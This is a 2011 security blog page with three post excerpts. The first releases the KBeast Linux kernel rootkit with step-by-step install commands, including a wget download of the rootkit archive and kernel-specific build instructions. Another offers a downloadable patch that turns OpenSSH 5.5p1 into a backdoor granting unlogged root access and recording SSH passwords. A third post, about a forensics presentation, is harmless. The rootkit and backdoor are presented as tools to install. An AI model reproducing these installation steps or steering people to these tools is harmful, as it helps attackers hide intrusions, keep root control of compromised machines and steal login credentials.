Close Panel

31

Dec

2011

[UPDATE] KBeast – The New Kernel Rootkit

By IPSECS Admin. Posted in Exploitation | 6 Comments »

KBeast (Kernel Beast) is new kernel rootkit based on the publicly known rootkit, modification is made in order to support kernel 2.6.16, 2.6.18, 2.6.32, and 2.6.35. Actually it should work for kernel 2.6.9 up to 2.6.35 or more, but our installer script is only created for 2.6.16, 2.6.18, 2.6.32, and 2.6.35. Below are quick step installing the beast:

  • wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
  • tar zxvf ipsecs-kbeast-v1.tar.gz
  • cd kbeast-v1/
  • modify config.h to meet your requirement, remember that _MAGIC_NAME_ must be user with sh/bash shell
  • In order to install in kernel 2.6.16 or 2.6.18, execute ./setup build 0
  • In order to install in kernel 2.6.32 or 2.6.35, execute ./setup build (actually it should work for the recent kernel)
  • In order to install in kernel 2.6.9, edit .cc1 file to remove all sys_unlinkat() related code, modify syscall table address manually, then execute ./setup build 0

Be kind to note that the beast has been tested in, but not limited to, kernel 2.6.9, 2.6.16, 2.6.18, 2.6.32, 2.6.35 (i386 or x86_64). The feature of this rootkit are:

Read more »

 

8

Dec

2011

Network & Computer Forensics

By IPSECS Admin. Posted in Forensics, Presentation | 6 Comments »

I had presented general method of network & computer forensics for Depkominfo at November, 23th, 2011.  You can enjoy my presentation on my slideshare below:

 

8

Dec

2011

OpenSSH 5.5p1 Backdoor

By IPSECS Admin. Posted in Exploitation | 1 Comment »

OpenSSH can be modified as powerful unix/linux backdoor that gave instant root access without being logged by the system. It’s also possible to record username and password for all incoming or outgoing SSH login. Some patches has been developed in order to modify OpenSSH 2.x, OpenSSH 3.x, and OpenSSH 4.x as a backdoor. We develop patch for OpenSSH 5.5p1 which can be downloaded here.